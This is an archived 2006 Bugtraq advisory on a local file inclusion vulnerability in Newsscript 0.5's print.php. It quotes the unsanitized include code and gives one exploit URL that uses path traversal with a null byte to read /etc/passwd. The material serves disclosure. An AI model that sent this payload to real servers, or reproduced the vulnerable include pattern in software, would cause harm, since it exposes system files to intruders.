lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060912030619.28681.qmail@securityfocus.com>
Date: 12 Sep 2006 03:06:19 -0000
From: daftrix@...il.com
To: bugtraq@...urityfocus.com
Subject: Newsscript version 0.5 (print.php) Local File Inclusion Vulnerability

# Subject:

--- "Newsscript version 0.5 (print.php) Local File Inclusion Vulnerability "

# Vulnerable version:

--- "Newsscript version 0.5"



# Vendor URL:

--- Emaill - mail@...master-journal.com
--- Website - http://webmaster-journal.com



# Available in:

---http://www.comscripts.com/scripts/php.wm-news.203.html



# Vulnerability:

--- Vulnerable code in print/print.php

--- $ide var is not sanitized and can be used to include files from local resources

--- 1	    <html>
--- 2	    <head>
--- 3	    <?
--- 4         $file_name = "../".$ide.".txt";
--- 5	    ?>
--- 
---
--- 27	     include($file_name);



# Exploit:

--- http://localhost/newscript/print/print.php?ide=../../../../etc/passwd%00



# Discovered By:

--- Daftrix[at]Gmail.com
--- Daftrix Security Investigations
--- http://www.daftrix.com 

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ